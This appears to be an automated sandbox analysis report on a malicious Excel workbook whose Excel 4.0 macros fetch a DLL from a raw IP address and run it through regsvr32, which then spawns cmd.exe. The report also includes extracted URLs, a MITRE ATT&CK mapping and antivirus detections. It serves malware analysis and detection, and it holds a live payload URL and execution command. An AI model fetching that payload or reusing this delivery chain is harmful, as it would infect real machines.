Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://settings.outlook.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://tasks.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Total_order_data-V2434883.xlsb	Initial sample: CALL
Source: Total_order_data-V2434883.xlsb	Initial sample: CALL
Source: Total_order_data-V2434883.xlsb	Initial sample: EXEC

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Source: classification engine

Classification label: mal80.expl.evad.winXLSB@5/10@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{40B4E29A-81E2-4785-950C-FD213AB7F011} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_00E02AF0 push dword ptr [edx+14h]; ret

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_01170456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0117095E mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe

Source: Yara match

File source: app.xml, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	DLL Side-Loading1	Process Injection11	Masquerading111	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution42	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection11	LSASS Memory	System Information Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Scripting1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol21	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Total_order_data-V2434883.xlsb	2%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.regsvr32.exe.970000.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
2.2.regsvr32.exe.8340f0.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.regsvr32.exe.9c0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
http://185.180.199.121/sat1_0609_2.dll	0%	Virustotal		Browse
http://185.180.199.121/sat1_0609_2.dll	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Virustotal		Browse
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.180.199.121/sat1_0609_2.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://login.microsoftonline.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://shell.suite.office.com:1443	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://autodiscover-s.outlook.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://cdn.entity.	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://powerlift.acompli.net	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://cortana.ai	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://api.aadrm.com/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://api.microsoftstream.com/api/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://cr.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://ecs.office.com/config/v2/Office	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://graph.ppe.windows.net	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://officeci.azurewebsites.net/api/	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://store.office.cn/addinstemplate	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://globaldisco.crm.dynamics.com	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false		high
https://store.officeppe.com/addinstemplate	E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
